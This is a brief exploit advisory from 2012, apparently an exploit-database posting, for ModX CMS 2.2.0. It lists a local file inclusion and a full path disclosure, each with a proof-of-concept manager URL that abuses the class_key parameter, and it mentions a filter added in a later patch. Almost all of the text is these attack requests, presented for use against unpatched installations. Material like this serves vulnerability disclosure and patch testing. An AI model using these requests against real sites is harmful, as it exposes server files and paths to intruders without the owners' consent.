# Title : ModX 2.2.0 Multiple Vulnerabilities
# Published : 2012-03-14
# Exploit Title: Modx 2.2.0 LFI and Full Path Disclosure
# Date: 13/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://modx.com/download/
# Version: 2.2.0
# Tested on: Windows XP / Windows 7 / Ubuntu
+[-- LFI --]+
http://localhost/cms/manager/?a=55&class_key=
** Filter added in 2.2.0pl2 **
+[-- FPD --]+
http://localhost/cms/manager/?a=55&class_key=somefilethatdoesntexsist
+[-- Shoutz --]+
All the belegit crew..